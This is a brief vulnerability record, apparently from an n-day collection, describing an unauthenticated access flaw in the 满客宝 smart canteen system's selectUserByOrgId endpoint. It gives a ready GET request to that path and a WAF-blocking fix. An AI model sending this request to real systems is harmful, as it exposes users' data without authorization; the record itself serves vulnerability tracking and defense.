vendor = "满客宝"
name = "满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞"
type = "未授权访问"
version = "未知"
path = "/yuding/selectUserByOrgId.action"
detail = "GET /yuding/selectUserByOrgId.action?record= HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Connection: close"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
